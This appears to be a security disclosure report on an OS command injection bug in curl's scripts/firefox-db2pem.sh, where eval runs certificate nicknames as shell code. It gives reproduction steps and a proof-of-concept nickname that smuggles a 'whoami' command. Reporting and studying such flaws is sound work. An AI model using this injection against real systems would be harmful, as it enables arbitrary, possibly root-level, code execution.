OS Command Injection in scripts/firefox-db2pem.sh via untrusted certificate nicknames

On AI usage: Only for grammar/formatting suggestions/POC code troubleshooting; all vulnerability discovery, POC code creation, and analysis were done manually. Hey folks, I noticed something I think is worth bringing to you-- scripts/firefox-db2pem.sh helper in the curl source uses `eval certutil -d "$db" -L -n "$nickname" -a` to extract each certificate by nickname. Because eval re-parses its arguments, a malicious nickname containing shell syntax (e.g. $(whoami > pwned)) is executed on the host. Affected Version -curl master as of June 26 2025 (commit 2a9dfe2), not sure how long this vuln has been in for though. Steps To Reproduce 1. Install prerequisites `sudo apt-get install -y libnss3-tools openssl` 2. Create a throw-away profile `export HOME=$(mktemp -d)` `PROF="$HOME/.mozilla/firefox/safe.default"` `mkdir -p "$PROF"` `certutil -N --empty-password -d "$PROF"` 3. Generate a self-signed cert `openssl req -x509 -newkey rsa:2048 -nodes \ -subj '/CN=RCE-Test/' -days 1 \ -keyout "$HOME/key.pem" -out "$HOME/cert.pem"` 4. Import it with a malicious nickname that runs whoami `payload='evil$(whoami > pwned)' certutil -A -d "$PROF" -n "$payload" -t "C,C,C" -i "$HOME/cert.pem"` 5.Verify the nickname is listed `certutil -L -h 'Builtin Object Token' -d "$PROF"` 6. Run the vulnerable helper `bash -x scripts/firefox-db2pem.sh "$HOME/ca-bundle.pem" || true` 7. Observe proof file `cat pwned` You can also just use my below POC script which I'll attach, but its basically just those steps automated. Supporting Material / References Vulnerable code snippet in scripts/firefox-db2pem.sh: 54 certutil -L -h 'Builtin Object Token' -d "$db" | \ 55 grep ' *[CcGTPpu]*,[CcGTPpu]*,[CcGTPpu]* *$' | \ 56 sed -e 's/ *[CcGTPpu]*,[CcGTPpu]*,[CcGTPpu]* *$//' -e 's/\(.*\)/"\1"/' | \ 57 sort | \ 58 while read -r nickname; \ 59 do echo "$nickname" | sed -e "s/Builtin Object Token://g"; \ 60 eval certutil -d "$db" -L -n "$nickname" -a ; \ 61 done >> "$out" Because the nickname value is substituted into the string that eval executes, any shell metacharacters or command sequences in a nickname will run as part of the shell command. ## Impact An attacker who can import a certificate into any Firefox NSS database—e.g., their own profile—can achieve arbitrary code execution when scripts/firefox-db2pem.sh is run. In practice, many administrators run this helper as root to generate a system-wide CA bundle, so this bug yields root-level RCE on affected systems.